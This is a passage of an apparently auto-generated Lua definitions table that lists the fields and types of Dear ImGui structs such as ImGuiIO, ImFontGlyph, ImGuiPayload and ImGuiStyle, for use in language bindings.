defs["structs"]["ImFontConfig"][19]["type"] = "ImFont*"
defs["structs"]["ImFontGlyph"] = {}
defs["structs"]["ImFontGlyph"][1] = {}
defs["structs"]["ImFontGlyph"][1]["bitfield"] = "1"
defs["structs"]["ImFontGlyph"][1]["name"] = "Colored"
defs["structs"]["ImFontGlyph"][1]["type"] = "unsigned int"
defs["structs"]["ImFontGlyph"][2] = {}
defs["structs"]["ImFontGlyph"][2]["bitfield"] = "1"
defs["structs"]["ImFontGlyph"][2]["name"] = "Visible"
defs["structs"]["ImFontGlyph"][2]["type"] = "unsigned int"
defs["structs"]["ImFontGlyph"][3] = {}
defs["structs"]["ImFontGlyph"][3]["bitfield"] = "30"
defs["structs"]["ImFontGlyph"][3]["name"] = "Codepoint"
defs["structs"]["ImFontGlyph"][3]["type"] = "unsigned int"
defs["structs"]["ImFontGlyph"][4] = {}
defs["structs"]["ImFontGlyph"][4]["name"] = "AdvanceX"
defs["structs"]["ImFontGlyph"][4]["type"] = "float"
defs["structs"]["ImFontGlyph"][5] = {}
defs["structs"]["ImFontGlyph"][5]["name"] = "X0"
defs["structs"]["ImFontGlyph"][5]["type"] = "float"
defs["structs"]["ImFontGlyph"][6] = {}
defs["structs"]["ImFontGlyph"][6]["name"] = "Y0"
defs["structs"]["ImFontGlyph"][6]["type"] = "float"
defs["structs"]["ImFontGlyph"][7] = {}
defs["structs"]["ImFontGlyph"][7]["name"] = "X1"
defs["structs"]["ImFontGlyph"][7]["type"] = "float"
defs["structs"]["ImFontGlyph"][8] = {}
defs["structs"]["ImFontGlyph"][8]["name"] = "Y1"
defs["structs"]["ImFontGlyph"][8]["type"] = "float"
defs["structs"]["ImFontGlyph"][9] = {}
defs["structs"]["ImFontGlyph"][9]["name"] = "U0"
defs["structs"]["ImFontGlyph"][9]["type"] = "float"
defs["structs"]["ImFontGlyph"][10] = {}
defs["structs"]["ImFontGlyph"][10]["name"] = "V0"
defs["structs"]["ImFontGlyph"][10]["type"] = "float"
defs["structs"]["ImFontGlyph"][11] = {}
defs["structs"]["ImFontGlyph"][11]["name"] = "U1"
defs["structs"]["ImFontGlyph"][11]["type"] = "float"
defs["structs"]["ImFontGlyph"][12] = {}
defs["structs"]["ImFontGlyph"][12]["name"] = "V1"
defs["structs"]["ImFontGlyph"][12]["type"] = "float"
defs["structs"]["ImFontGlyphRangesBuilder"] = {}
defs["structs"]["ImFontGlyphRangesBuilder"][1] = {}
defs["structs"]["ImFontGlyphRangesBuilder"][1]["name"] = "UsedChars"
defs["structs"]["ImFontGlyphRangesBuilder"][1]["template_type"] = "ImU32"
defs["structs"]["ImFontGlyphRangesBuilder"][1]["type"] = "ImVector_ImU32"
defs["structs"]["ImGuiIO"] = {}
defs["structs"]["ImGuiIO"][1] = {}
defs["structs"]["ImGuiIO"][1]["name"] = "ConfigFlags"
defs["structs"]["ImGuiIO"][1]["type"] = "ImGuiConfigFlags"
defs["structs"]["ImGuiIO"][2] = {}
defs["structs"]["ImGuiIO"][2]["name"] = "BackendFlags"
defs["structs"]["ImGuiIO"][2]["type"] = "ImGuiBackendFlags"
defs["structs"]["ImGuiIO"][3] = {}
defs["structs"]["ImGuiIO"][3]["name"] = "DisplaySize"
defs["structs"]["ImGuiIO"][3]["type"] = "ImVec2"
defs["structs"]["ImGuiIO"][4] = {}
defs["structs"]["ImGuiIO"][4]["name"] = "DeltaTime"
defs["structs"]["ImGuiIO"][4]["type"] = "float"
defs["structs"]["ImGuiIO"][5] = {}
defs["structs"]["ImGuiIO"][5]["name"] = "IniSavingRate"
defs["structs"]["ImGuiIO"][5]["type"] = "float"
defs["structs"]["ImGuiIO"][6] = {}
defs["structs"]["ImGuiIO"][6]["name"] = "IniFilename"
defs["structs"]["ImGuiIO"][6]["type"] = "const char*"
defs["structs"]["ImGuiIO"][7] = {}
defs["structs"]["ImGuiIO"][7]["name"] = "LogFilename"
defs["structs"]["ImGuiIO"][7]["type"] = "const char*"
defs["structs"]["ImGuiIO"][8] = {}
defs["structs"]["ImGuiIO"][8]["name"] = "MouseDoubleClickTime"
defs["structs"]["ImGuiIO"][8]["type"] = "float"
defs["structs"]["ImGuiIO"][9] = {}
defs["structs"]["ImGuiIO"][9]["name"] = "MouseDoubleClickMaxDist"
defs["structs"]["ImGuiIO"][9]["type"] = "float"
defs["structs"]["ImGuiIO"][10] = {}
defs["structs"]["ImGuiIO"][10]["name"] = "MouseDragThreshold"
defs["structs"]["ImGuiIO"][10]["type"] = "float"
defs["structs"]["ImGuiIO"][11] = {}
defs["structs"]["ImGuiIO"][11]["name"] = "KeyMap[ImGuiKey_COUNT]"
defs["structs"]["ImGuiIO"][11]["size"] = 22
defs["structs"]["ImGuiIO"][11]["type"] = "int"
defs["structs"]["ImGuiIO"][12] = {}
defs["structs"]["ImGuiIO"][12]["name"] = "KeyRepeatDelay"
defs["structs"]["ImGuiIO"][12]["type"] = "float"
defs["structs"]["ImGuiIO"][13] = {}
defs["structs"]["ImGuiIO"][13]["name"] = "KeyRepeatRate"
defs["structs"]["ImGuiIO"][13]["type"] = "float"
defs["structs"]["ImGuiIO"][14] = {}
defs["structs"]["ImGuiIO"][14]["name"] = "UserData"
defs["structs"]["ImGuiIO"][14]["type"] = "void*"
defs["structs"]["ImGuiIO"][15] = {}
defs["structs"]["ImGuiIO"][15]["name"] = "Fonts"
defs["structs"]["ImGuiIO"][15]["type"] = "ImFontAtlas*"
defs["structs"]["ImGuiIO"][16] = {}
defs["structs"]["ImGuiIO"][16]["name"] = "FontGlobalScale"
defs["structs"]["ImGuiIO"][16]["type"] = "float"
defs["structs"]["ImGuiIO"][17] = {}
defs["structs"]["ImGuiIO"][17]["name"] = "FontAllowUserScaling"
defs["structs"]["ImGuiIO"][17]["type"] = "bool"
defs["structs"]["ImGuiIO"][18] = {}
defs["structs"]["ImGuiIO"][18]["name"] = "FontDefault"
defs["structs"]["ImGuiIO"][18]["type"] = "ImFont*"
defs["structs"]["ImGuiIO"][19] = {}
defs["structs"]["ImGuiIO"][19]["name"] = "DisplayFramebufferScale"
defs["structs"]["ImGuiIO"][19]["type"] = "ImVec2"
defs["structs"]["ImGuiIO"][20] = {}
defs["structs"]["ImGuiIO"][20]["name"] = "MouseDrawCursor"
defs["structs"]["ImGuiIO"][20]["type"] = "bool"
defs["structs"]["ImGuiIO"][21] = {}
defs["structs"]["ImGuiIO"][21]["name"] = "ConfigMacOSXBehaviors"
defs["structs"]["ImGuiIO"][21]["type"] = "bool"
defs["structs"]["ImGuiIO"][22] = {}
defs["structs"]["ImGuiIO"][22]["name"] = "ConfigInputTextCursorBlink"
defs["structs"]["ImGuiIO"][22]["type"] = "bool"
defs["structs"]["ImGuiIO"][23] = {}
defs["structs"]["ImGuiIO"][23]["name"] = "ConfigDragClickToInputText"
defs["structs"]["ImGuiIO"][23]["type"] = "bool"
defs["structs"]["ImGuiIO"][24] = {}
defs["structs"]["ImGuiIO"][24]["name"] = "ConfigWindowsResizeFromEdges"
defs["structs"]["ImGuiIO"][24]["type"] = "bool"
defs["structs"]["ImGuiIO"][25] = {}
defs["structs"]["ImGuiIO"][25]["name"] = "ConfigWindowsMoveFromTitleBarOnly"
defs["structs"]["ImGuiIO"][25]["type"] = "bool"
defs["structs"]["ImGuiIO"][26] = {}
defs["structs"]["ImGuiIO"][26]["name"] = "ConfigMemoryCompactTimer"
defs["structs"]["ImGuiIO"][26]["type"] = "float"
defs["structs"]["ImGuiIO"][27] = {}
defs["structs"]["ImGuiIO"][27]["name"] = "BackendPlatformName"
defs["structs"]["ImGuiIO"][27]["type"] = "const char*"
defs["structs"]["ImGuiIO"][28] = {}
defs["structs"]["ImGuiIO"][28]["name"] = "BackendRendererName"
defs["structs"]["ImGuiIO"][28]["type"] = "const char*"
defs["structs"]["ImGuiIO"][29] = {}
defs["structs"]["ImGuiIO"][29]["name"] = "BackendPlatformUserData"
defs["structs"]["ImGuiIO"][29]["type"] = "void*"
defs["structs"]["ImGuiIO"][30] = {}
defs["structs"]["ImGuiIO"][30]["name"] = "BackendRendererUserData"
defs["structs"]["ImGuiIO"][30]["type"] = "void*"
defs["structs"]["ImGuiIO"][31] = {}
defs["structs"]["ImGuiIO"][31]["name"] = "BackendLanguageUserData"
defs["structs"]["ImGuiIO"][31]["type"] = "void*"
defs["structs"]["ImGuiIO"][32] = {}
defs["structs"]["ImGuiIO"][32]["name"] = "GetClipboardTextFn"
defs["structs"]["ImGuiIO"][32]["type"] = "const char*(*)(void* user_data)"
defs["structs"]["ImGuiIO"][33] = {}
defs["structs"]["ImGuiIO"][33]["name"] = "SetClipboardTextFn"
defs["structs"]["ImGuiIO"][33]["type"] = "void(*)(void* user_data,const char* text)"
defs["structs"]["ImGuiIO"][34] = {}
defs["structs"]["ImGuiIO"][34]["name"] = "ClipboardUserData"
defs["structs"]["ImGuiIO"][34]["type"] = "void*"
defs["structs"]["ImGuiIO"][35] = {}
defs["structs"]["ImGuiIO"][35]["name"] = "ImeSetInputScreenPosFn"
defs["structs"]["ImGuiIO"][35]["type"] = "void(*)(int x,int y)"
defs["structs"]["ImGuiIO"][36] = {}
defs["structs"]["ImGuiIO"][36]["name"] = "ImeWindowHandle"
defs["structs"]["ImGuiIO"][36]["type"] = "void*"
defs["structs"]["ImGuiIO"][37] = {}
defs["structs"]["ImGuiIO"][37]["name"] = "MousePos"
defs["structs"]["ImGuiIO"][37]["type"] = "ImVec2"
defs["structs"]["ImGuiIO"][38] = {}
defs["structs"]["ImGuiIO"][38]["name"] = "MouseDown[5]"
defs["structs"]["ImGuiIO"][38]["size"] = 5
defs["structs"]["ImGuiIO"][38]["type"] = "bool"
defs["structs"]["ImGuiIO"][39] = {}
defs["structs"]["ImGuiIO"][39]["name"] = "MouseWheel"
defs["structs"]["ImGuiIO"][39]["type"] = "float"
defs["structs"]["ImGuiIO"][40] = {}
defs["structs"]["ImGuiIO"][40]["name"] = "MouseWheelH"
defs["structs"]["ImGuiIO"][40]["type"] = "float"
defs["structs"]["ImGuiIO"][41] = {}
defs["structs"]["ImGuiIO"][41]["name"] = "KeyCtrl"
defs["structs"]["ImGuiIO"][41]["type"] = "bool"
defs["structs"]["ImGuiIO"][42] = {}
defs["structs"]["ImGuiIO"][42]["name"] = "KeyShift"
defs["structs"]["ImGuiIO"][42]["type"] = "bool"
defs["structs"]["ImGuiIO"][43] = {}
defs["structs"]["ImGuiIO"][43]["name"] = "KeyAlt"
defs["structs"]["ImGuiIO"][43]["type"] = "bool"
defs["structs"]["ImGuiIO"][44] = {}
defs["structs"]["ImGuiIO"][44]["name"] = "KeySuper"
defs["structs"]["ImGuiIO"][44]["type"] = "bool"
defs["structs"]["ImGuiIO"][45] = {}
defs["structs"]["ImGuiIO"][45]["name"] = "KeysDown[512]"
defs["structs"]["ImGuiIO"][45]["size"] = 512
defs["structs"]["ImGuiIO"][45]["type"] = "bool"
defs["structs"]["ImGuiIO"][46] = {}
defs["structs"]["ImGuiIO"][46]["name"] = "NavInputs[ImGuiNavInput_COUNT]"
defs["structs"]["ImGuiIO"][46]["size"] = 21
defs["structs"]["ImGuiIO"][46]["type"] = "float"
defs["structs"]["ImGuiIO"][47] = {}
defs["structs"]["ImGuiIO"][47]["name"] = "WantCaptureMouse"
defs["structs"]["ImGuiIO"][47]["type"] = "bool"
defs["structs"]["ImGuiIO"][48] = {}
defs["structs"]["ImGuiIO"][48]["name"] = "WantCaptureKeyboard"
defs["structs"]["ImGuiIO"][48]["type"] = "bool"
defs["structs"]["ImGuiIO"][49] = {}
defs["structs"]["ImGuiIO"][49]["name"] = "WantTextInput"
defs["structs"]["ImGuiIO"][49]["type"] = "bool"
defs["structs"]["ImGuiIO"][50] = {}
defs["structs"]["ImGuiIO"][50]["name"] = "WantSetMousePos"
defs["structs"]["ImGuiIO"][50]["type"] = "bool"
defs["structs"]["ImGuiIO"][51] = {}
defs["structs"]["ImGuiIO"][51]["name"] = "WantSaveIniSettings"
defs["structs"]["ImGuiIO"][51]["type"] = "bool"
defs["structs"]["ImGuiIO"][52] = {}
defs["structs"]["ImGuiIO"][52]["name"] = "NavActive"
defs["structs"]["ImGuiIO"][52]["type"] = "bool"
defs["structs"]["ImGuiIO"][53] = {}
defs["structs"]["ImGuiIO"][53]["name"] = "NavVisible"
defs["structs"]["ImGuiIO"][53]["type"] = "bool"
defs["structs"]["ImGuiIO"][54] = {}
defs["structs"]["ImGuiIO"][54]["name"] = "Framerate"
defs["structs"]["ImGuiIO"][54]["type"] = "float"
defs["structs"]["ImGuiIO"][55] = {}
defs["structs"]["ImGuiIO"][55]["name"] = "MetricsRenderVertices"
defs["structs"]["ImGuiIO"][55]["type"] = "int"
defs["structs"]["ImGuiIO"][56] = {}
defs["structs"]["ImGuiIO"][56]["name"] = "MetricsRenderIndices"
defs["structs"]["ImGuiIO"][56]["type"] = "int"
defs["structs"]["ImGuiIO"][57] = {}
defs["structs"]["ImGuiIO"][57]["name"] = "MetricsRenderWindows"
defs["structs"]["ImGuiIO"][57]["type"] = "int"
defs["structs"]["ImGuiIO"][58] = {}
defs["structs"]["ImGuiIO"][58]["name"] = "MetricsActiveWindows"
defs["structs"]["ImGuiIO"][58]["type"] = "int"
defs["structs"]["ImGuiIO"][59] = {}
defs["structs"]["ImGuiIO"][59]["name"] = "MetricsActiveAllocations"
defs["structs"]["ImGuiIO"][59]["type"] = "int"
defs["structs"]["ImGuiIO"][60] = {}
defs["structs"]["ImGuiIO"][60]["name"] = "MouseDelta"
defs["structs"]["ImGuiIO"][60]["type"] = "ImVec2"
defs["structs"]["ImGuiIO"][61] = {}
defs["structs"]["ImGuiIO"][61]["name"] = "KeyMods"
defs["structs"]["ImGuiIO"][61]["type"] = "ImGuiKeyModFlags"
defs["structs"]["ImGuiIO"][62] = {}
defs["structs"]["ImGuiIO"][62]["name"] = "MousePosPrev"
defs["structs"]["ImGuiIO"][62]["type"] = "ImVec2"
defs["structs"]["ImGuiIO"][63] = {}
defs["structs"]["ImGuiIO"][63]["name"] = "MouseClickedPos[5]"
defs["structs"]["ImGuiIO"][63]["size"] = 5
defs["structs"]["ImGuiIO"][63]["type"] = "ImVec2"
defs["structs"]["ImGuiIO"][64] = {}
defs["structs"]["ImGuiIO"][64]["name"] = "MouseClickedTime[5]"
defs["structs"]["ImGuiIO"][64]["size"] = 5
defs["structs"]["ImGuiIO"][64]["type"] = "double"
defs["structs"]["ImGuiIO"][65] = {}
defs["structs"]["ImGuiIO"][65]["name"] = "MouseClicked[5]"
defs["structs"]["ImGuiIO"][65]["size"] = 5
defs["structs"]["ImGuiIO"][65]["type"] = "bool"
defs["structs"]["ImGuiIO"][66] = {}
defs["structs"]["ImGuiIO"][66]["name"] = "MouseDoubleClicked[5]"
defs["structs"]["ImGuiIO"][66]["size"] = 5
defs["structs"]["ImGuiIO"][66]["type"] = "bool"
defs["structs"]["ImGuiIO"][67] = {}
defs["structs"]["ImGuiIO"][67]["name"] = "MouseReleased[5]"
defs["structs"]["ImGuiIO"][67]["size"] = 5
defs["structs"]["ImGuiIO"][67]["type"] = "bool"
defs["structs"]["ImGuiIO"][68] = {}
defs["structs"]["ImGuiIO"][68]["name"] = "MouseDownOwned[5]"
defs["structs"]["ImGuiIO"][68]["size"] = 5
defs["structs"]["ImGuiIO"][68]["type"] = "bool"
defs["structs"]["ImGuiIO"][69] = {}
defs["structs"]["ImGuiIO"][69]["name"] = "MouseDownWasDoubleClick[5]"
defs["structs"]["ImGuiIO"][69]["size"] = 5
defs["structs"]["ImGuiIO"][69]["type"] = "bool"
defs["structs"]["ImGuiIO"][70] = {}
defs["structs"]["ImGuiIO"][70]["name"] = "MouseDownDuration[5]"
defs["structs"]["ImGuiIO"][70]["size"] = 5
defs["structs"]["ImGuiIO"][70]["type"] = "float"
defs["structs"]["ImGuiIO"][71] = {}
defs["structs"]["ImGuiIO"][71]["name"] = "MouseDownDurationPrev[5]"
defs["structs"]["ImGuiIO"][71]["size"] = 5
defs["structs"]["ImGuiIO"][71]["type"] = "float"
defs["structs"]["ImGuiIO"][72] = {}
defs["structs"]["ImGuiIO"][72]["name"] = "MouseDragMaxDistanceAbs[5]"
defs["structs"]["ImGuiIO"][72]["size"] = 5
defs["structs"]["ImGuiIO"][72]["type"] = "ImVec2"
defs["structs"]["ImGuiIO"][73] = {}
defs["structs"]["ImGuiIO"][73]["name"] = "MouseDragMaxDistanceSqr[5]"
defs["structs"]["ImGuiIO"][73]["size"] = 5
defs["structs"]["ImGuiIO"][73]["type"] = "float"
defs["structs"]["ImGuiIO"][74] = {}
defs["structs"]["ImGuiIO"][74]["name"] = "KeysDownDuration[512]"
defs["structs"]["ImGuiIO"][74]["size"] = 512
defs["structs"]["ImGuiIO"][74]["type"] = "float"
defs["structs"]["ImGuiIO"][75] = {}
defs["structs"]["ImGuiIO"][75]["name"] = "KeysDownDurationPrev[512]"
defs["structs"]["ImGuiIO"][75]["size"] = 512
defs["structs"]["ImGuiIO"][75]["type"] = "float"
defs["structs"]["ImGuiIO"][76] = {}
defs["structs"]["ImGuiIO"][76]["name"] = "NavInputsDownDuration[ImGuiNavInput_COUNT]"
defs["structs"]["ImGuiIO"][76]["size"] = 21
defs["structs"]["ImGuiIO"][76]["type"] = "float"
defs["structs"]["ImGuiIO"][77] = {}
defs["structs"]["ImGuiIO"][77]["name"] = "NavInputsDownDurationPrev[ImGuiNavInput_COUNT]"
defs["structs"]["ImGuiIO"][77]["size"] = 21
defs["structs"]["ImGuiIO"][77]["type"] = "float"
defs["structs"]["ImGuiIO"][78] = {}
defs["structs"]["ImGuiIO"][78]["name"] = "PenPressure"
defs["structs"]["ImGuiIO"][78]["type"] = "float"
defs["structs"]["ImGuiIO"][79] = {}
defs["structs"]["ImGuiIO"][79]["name"] = "InputQueueSurrogate"
defs["structs"]["ImGuiIO"][79]["type"] = "ImWchar16"
defs["structs"]["ImGuiIO"][80] = {}
defs["structs"]["ImGuiIO"][80]["name"] = "InputQueueCharacters"
defs["structs"]["ImGuiIO"][80]["template_type"] = "ImWchar"
defs["structs"]["ImGuiIO"][80]["type"] = "ImVector_ImWchar"
defs["structs"]["ImGuiInputTextCallbackData"] = {}
defs["structs"]["ImGuiInputTextCallbackData"][1] = {}
defs["structs"]["ImGuiInputTextCallbackData"][1]["name"] = "EventFlag"
defs["structs"]["ImGuiInputTextCallbackData"][1]["type"] = "ImGuiInputTextFlags"
defs["structs"]["ImGuiInputTextCallbackData"][2] = {}
defs["structs"]["ImGuiInputTextCallbackData"][2]["name"] = "Flags"
defs["structs"]["ImGuiInputTextCallbackData"][2]["type"] = "ImGuiInputTextFlags"
defs["structs"]["ImGuiInputTextCallbackData"][3] = {}
defs["structs"]["ImGuiInputTextCallbackData"][3]["name"] = "UserData"
defs["structs"]["ImGuiInputTextCallbackData"][3]["type"] = "void*"
defs["structs"]["ImGuiInputTextCallbackData"][4] = {}
defs["structs"]["ImGuiInputTextCallbackData"][4]["name"] = "EventChar"
defs["structs"]["ImGuiInputTextCallbackData"][4]["type"] = "ImWchar"
defs["structs"]["ImGuiInputTextCallbackData"][5] = {}
defs["structs"]["ImGuiInputTextCallbackData"][5]["name"] = "EventKey"
defs["structs"]["ImGuiInputTextCallbackData"][5]["type"] = "ImGuiKey"
defs["structs"]["ImGuiInputTextCallbackData"][6] = {}
defs["structs"]["ImGuiInputTextCallbackData"][6]["name"] = "Buf"
defs["structs"]["ImGuiInputTextCallbackData"][6]["type"] = "char*"
defs["structs"]["ImGuiInputTextCallbackData"][7] = {}
defs["structs"]["ImGuiInputTextCallbackData"][7]["name"] = "BufTextLen"
defs["structs"]["ImGuiInputTextCallbackData"][7]["type"] = "int"
defs["structs"]["ImGuiInputTextCallbackData"][8] = {}
defs["structs"]["ImGuiInputTextCallbackData"][8]["name"] = "BufSize"
defs["structs"]["ImGuiInputTextCallbackData"][8]["type"] = "int"
defs["structs"]["ImGuiInputTextCallbackData"][9] = {}
defs["structs"]["ImGuiInputTextCallbackData"][9]["name"] = "BufDirty"
defs["structs"]["ImGuiInputTextCallbackData"][9]["type"] = "bool"
defs["structs"]["ImGuiInputTextCallbackData"][10] = {}
defs["structs"]["ImGuiInputTextCallbackData"][10]["name"] = "CursorPos"
defs["structs"]["ImGuiInputTextCallbackData"][10]["type"] = "int"
defs["structs"]["ImGuiInputTextCallbackData"][11] = {}
defs["structs"]["ImGuiInputTextCallbackData"][11]["name"] = "SelectionStart"
defs["structs"]["ImGuiInputTextCallbackData"][11]["type"] = "int"
defs["structs"]["ImGuiInputTextCallbackData"][12] = {}
defs["structs"]["ImGuiInputTextCallbackData"][12]["name"] = "SelectionEnd"
defs["structs"]["ImGuiInputTextCallbackData"][12]["type"] = "int"
defs["structs"]["ImGuiListClipper"] = {}
defs["structs"]["ImGuiListClipper"][1] = {}
defs["structs"]["ImGuiListClipper"][1]["name"] = "DisplayStart"
defs["structs"]["ImGuiListClipper"][1]["type"] = "int"
defs["structs"]["ImGuiListClipper"][2] = {}
defs["structs"]["ImGuiListClipper"][2]["name"] = "DisplayEnd"
defs["structs"]["ImGuiListClipper"][2]["type"] = "int"
defs["structs"]["ImGuiListClipper"][3] = {}
defs["structs"]["ImGuiListClipper"][3]["name"] = "ItemsCount"
defs["structs"]["ImGuiListClipper"][3]["type"] = "int"
defs["structs"]["ImGuiListClipper"][4] = {}
defs["structs"]["ImGuiListClipper"][4]["name"] = "StepNo"
defs["structs"]["ImGuiListClipper"][4]["type"] = "int"
defs["structs"]["ImGuiListClipper"][5] = {}
defs["structs"]["ImGuiListClipper"][5]["name"] = "ItemsFrozen"
defs["structs"]["ImGuiListClipper"][5]["type"] = "int"
defs["structs"]["ImGuiListClipper"][6] = {}
defs["structs"]["ImGuiListClipper"][6]["name"] = "ItemsHeight"
defs["structs"]["ImGuiListClipper"][6]["type"] = "float"
defs["structs"]["ImGuiListClipper"][7] = {}
defs["structs"]["ImGuiListClipper"][7]["name"] = "StartPosY"
defs["structs"]["ImGuiListClipper"][7]["type"] = "float"
defs["structs"]["ImGuiOnceUponAFrame"] = {}
defs["structs"]["ImGuiOnceUponAFrame"][1] = {}
defs["structs"]["ImGuiOnceUponAFrame"][1]["name"] = "RefFrame"
defs["structs"]["ImGuiOnceUponAFrame"][1]["type"] = "int"
defs["structs"]["ImGuiPayload"] = {}
defs["structs"]["ImGuiPayload"][1] = {}
defs["structs"]["ImGuiPayload"][1]["name"] = "Data"
defs["structs"]["ImGuiPayload"][1]["type"] = "void*"
defs["structs"]["ImGuiPayload"][2] = {}
defs["structs"]["ImGuiPayload"][2]["name"] = "DataSize"
defs["structs"]["ImGuiPayload"][2]["type"] = "int"
defs["structs"]["ImGuiPayload"][3] = {}
defs["structs"]["ImGuiPayload"][3]["name"] = "SourceId"
defs["structs"]["ImGuiPayload"][3]["type"] = "ImGuiID"
defs["structs"]["ImGuiPayload"][4] = {}
defs["structs"]["ImGuiPayload"][4]["name"] = "SourceParentId"
defs["structs"]["ImGuiPayload"][4]["type"] = "ImGuiID"
defs["structs"]["ImGuiPayload"][5] = {}
defs["structs"]["ImGuiPayload"][5]["name"] = "DataFrameCount"
defs["structs"]["ImGuiPayload"][5]["type"] = "int"
defs["structs"]["ImGuiPayload"][6] = {}
defs["structs"]["ImGuiPayload"][6]["name"] = "DataType[32+1]"
defs["structs"]["ImGuiPayload"][6]["size"] = 33
defs["structs"]["ImGuiPayload"][6]["type"] = "char"
defs["structs"]["ImGuiPayload"][7] = {}
defs["structs"]["ImGuiPayload"][7]["name"] = "Preview"
defs["structs"]["ImGuiPayload"][7]["type"] = "bool"
defs["structs"]["ImGuiPayload"][8] = {}
defs["structs"]["ImGuiPayload"][8]["name"] = "Delivery"
defs["structs"]["ImGuiPayload"][8]["type"] = "bool"
defs["structs"]["ImGuiSizeCallbackData"] = {}
defs["structs"]["ImGuiSizeCallbackData"][1] = {}
defs["structs"]["ImGuiSizeCallbackData"][1]["name"] = "UserData"
defs["structs"]["ImGuiSizeCallbackData"][1]["type"] = "void*"
defs["structs"]["ImGuiSizeCallbackData"][2] = {}
defs["structs"]["ImGuiSizeCallbackData"][2]["name"] = "Pos"
defs["structs"]["ImGuiSizeCallbackData"][2]["type"] = "ImVec2"
defs["structs"]["ImGuiSizeCallbackData"][3] = {}
defs["structs"]["ImGuiSizeCallbackData"][3]["name"] = "CurrentSize"
defs["structs"]["ImGuiSizeCallbackData"][3]["type"] = "ImVec2"
defs["structs"]["ImGuiSizeCallbackData"][4] = {}
defs["structs"]["ImGuiSizeCallbackData"][4]["name"] = "DesiredSize"
defs["structs"]["ImGuiSizeCallbackData"][4]["type"] = "ImVec2"
defs["structs"]["ImGuiStorage"] = {}
defs["structs"]["ImGuiStorage"][1] = {}
defs["structs"]["ImGuiStorage"][1]["name"] = "Data"
defs["structs"]["ImGuiStorage"][1]["template_type"] = "ImGuiStoragePair"
defs["structs"]["ImGuiStorage"][1]["type"] = "ImVector_ImGuiStoragePair"
defs["structs"]["ImGuiStoragePair"] = {}
defs["structs"]["ImGuiStoragePair"][1] = {}
defs["structs"]["ImGuiStoragePair"][1]["name"] = "key"
defs["structs"]["ImGuiStoragePair"][1]["type"] = "ImGuiID"
defs["structs"]["ImGuiStoragePair"][2] = {}
defs["structs"]["ImGuiStoragePair"][2]["name"] = ""
defs["structs"]["ImGuiStoragePair"][2]["type"] = "union { int val_i; float val_f; void* val_p;}"
defs["structs"]["ImGuiStyle"] = {}
defs["structs"]["ImGuiStyle"][1] = {}
defs["structs"]["ImGuiStyle"][1]["name"] = "Alpha"
defs["structs"]["ImGuiStyle"][1]["type"] = "float"
defs["structs"]["ImGuiStyle"][2] = {}
defs["structs"]["ImGuiStyle"][2]["name"] = "WindowPadding"
defs["structs"]["ImGuiStyle"][2]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][3] = {}
defs["structs"]["ImGuiStyle"][3]["name"] = "WindowRounding"
defs["structs"]["ImGuiStyle"][3]["type"] = "float"
defs["structs"]["ImGuiStyle"][4] = {}
defs["structs"]["ImGuiStyle"][4]["name"] = "WindowBorderSize"
defs["structs"]["ImGuiStyle"][4]["type"] = "float"
defs["structs"]["ImGuiStyle"][5] = {}
defs["structs"]["ImGuiStyle"][5]["name"] = "WindowMinSize"
defs["structs"]["ImGuiStyle"][5]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][6] = {}
defs["structs"]["ImGuiStyle"][6]["name"] = "WindowTitleAlign"
defs["structs"]["ImGuiStyle"][6]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][7] = {}
defs["structs"]["ImGuiStyle"][7]["name"] = "WindowMenuButtonPosition"
defs["structs"]["ImGuiStyle"][7]["type"] = "ImGuiDir"
defs["structs"]["ImGuiStyle"][8] = {}
defs["structs"]["ImGuiStyle"][8]["name"] = "ChildRounding"
defs["structs"]["ImGuiStyle"][8]["type"] = "float"
defs["structs"]["ImGuiStyle"][9] = {}
defs["structs"]["ImGuiStyle"][9]["name"] = "ChildBorderSize"
defs["structs"]["ImGuiStyle"][9]["type"] = "float"
defs["structs"]["ImGuiStyle"][10] = {}
defs["structs"]["ImGuiStyle"][10]["name"] = "PopupRounding"
defs["structs"]["ImGuiStyle"][10]["type"] = "float"
defs["structs"]["ImGuiStyle"][11] = {}
defs["structs"]["ImGuiStyle"][11]["name"] = "PopupBorderSize"
defs["structs"]["ImGuiStyle"][11]["type"] = "float"
defs["structs"]["ImGuiStyle"][12] = {}
defs["structs"]["ImGuiStyle"][12]["name"] = "FramePadding"
defs["structs"]["ImGuiStyle"][12]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][13] = {}
defs["structs"]["ImGuiStyle"][13]["name"] = "FrameRounding"
defs["structs"]["ImGuiStyle"][13]["type"] = "float"
defs["structs"]["ImGuiStyle"][14] = {}
defs["structs"]["ImGuiStyle"][14]["name"] = "FrameBorderSize"
defs["structs"]["ImGuiStyle"][14]["type"] = "float"
defs["structs"]["ImGuiStyle"][15] = {}
defs["structs"]["ImGuiStyle"][15]["name"] = "ItemSpacing"
defs["structs"]["ImGuiStyle"][15]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][16] = {}
defs["structs"]["ImGuiStyle"][16]["name"] = "ItemInnerSpacing"
defs["structs"]["ImGuiStyle"][16]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][17] = {}
defs["structs"]["ImGuiStyle"][17]["name"] = "CellPadding"
defs["structs"]["ImGuiStyle"][17]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][18] = {}
defs["structs"]["ImGuiStyle"][18]["name"] = "TouchExtraPadding"
defs["structs"]["ImGuiStyle"][18]["type"] = "ImVec2"
defs["structs"]["ImGuiStyle"][19] = {}
defs["structs"]["ImGuiStyle"][19]["name"] = "IndentSpacing"
defs["structs"]["ImGuiStyle"][19]["type"] = "float"
defs["structs"]["ImGuiStyle"][20] = {}
defs["structs"]["ImGuiStyle"][20]["name"] = "ColumnsMinSpacing"
defs["structs"]["ImGuiStyle"][20]["type"] = "float"
defs["structs"]["ImGuiStyle"][21] = {}
defs["structs"]["ImGuiStyle"][21]["name"] = "ScrollbarSize"
defs["structs"]["ImGuiStyle"][21]["type"] = "float"
defs["structs"]["ImGuiStyle"][22] = {}
defs["structs"]["ImGuiStyle"][22]["name"] = "ScrollbarRounding"
defs["structs"]["ImGuiStyle"][22]["type"] = "float"
defs["structs"]["ImGuiStyle"][23] = {}
defs["structs"]["ImGuiStyle"][23]["name"] = "GrabMinSize"
defs["structs"]["ImGuiStyle"][23]["type"] = "float"
defs["structs"]["ImGuiStyle"][24] = {}
defs["structs"]["ImGuiStyle"][24]["name"] = "GrabRounding"
defs["structs"]["ImGuiStyle"][24]["type"] = "float"
defs["structs"]["ImGuiStyle"][25] = {}
